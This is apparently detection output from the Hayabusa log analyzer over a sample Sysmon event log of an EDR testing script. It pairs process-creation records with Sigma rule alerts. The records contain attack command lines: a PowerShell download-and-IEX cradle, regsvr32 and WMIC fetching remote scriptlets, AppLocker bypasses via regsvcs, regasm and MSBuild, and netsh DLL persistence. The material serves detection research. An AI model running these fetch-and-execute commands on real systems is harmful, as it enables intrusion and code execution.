Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker 
Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 
AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 
+09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 
+09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port 
Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 